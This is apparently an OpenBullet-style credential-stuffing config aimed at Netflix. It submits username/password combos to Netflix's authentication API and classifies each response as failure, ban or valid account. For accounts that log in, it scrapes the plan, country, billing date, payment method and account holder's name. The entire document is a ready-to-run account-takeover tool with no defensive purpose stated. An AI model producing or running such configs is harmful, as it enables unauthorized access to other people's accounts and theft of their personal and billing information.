REQUEST GET "https://www.netflix.com/au/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#flwssn PARSE "<COOKIES(flwssn)>" LR "" "" -> VAR "flwssn" 

#authURL PARSE "<SOURCE>" LR "name=\"authURL\" value=\"" "\"" -> VAR "authURL" 

#Encode FUNCTION URLEncode "<authURL>" -> VAR "AUTH" 

REQUEST POST "https://api-global.netflix.com/account/auth" 
  CONTENT "email=<USER>&password=<PASS>&setCookies=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Referer: https://www.netflix.com/Login" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "NetflixId\":null,\"user\":{\"" 
    KEY "Incorrect email address or password" 
    KEY "Missing password" 
    KEY "NEVER_MEMBER" 
  KEYCHAIN Ban OR 
    KEY "Invalid Request" 
  KEYCHAIN Success OR 
    KEY "CURRENT_MEMBER" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "FORMER_MEMBER" 

REQUEST GET "https://www.netflix.com/YourAccount" 
  
  COOKIE "flwssn: <flwssn>" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.netflix.com" 
  HEADER "Referer: https://www.netflix.com/browse" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" 

#Plan PARSE "<SOURCE>" LR "data-uia=\"plan-label\"><b>" "</b>" -> CAP "Plan" 

#Country PARSE "<SOURCE>" LR "\",\"currentCountry\":\"" "\"" -> CAP "currentCountry" 

#membership_Status PARSE "<SOURCE>" LR "membershipStatus\":\"" "\"," CreateEmpty=FALSE -> CAP "membershipStatus" 

#Billing PARSE "<SOURCE>" LR "data-uia=\"nextBillingDate-item\">" "<" -> CAP "nextBillingDate" 

#Payment_Method PARSE "<SOURCE>" LR "paymentMethod\":{\"fieldType\":\"String\",\"value\":\"" "\"}" -> CAP "paymentMethod" 

#first_Name PARSE "<SOURCE>" LR "firstName\":\"" "\"" CreateEmpty=FALSE -> CAP "firstName" 

#last_Name PARSE "<SOURCE>" LR "lastName\":\"" "\"," CreateEmpty=FALSE -> CAP "lastName" 

#has_DvD PARSE "<SOURCE>" LR ",\"hasDvd\":" ",\"" CreateEmpty=FALSE -> CAP "hasDvd" 

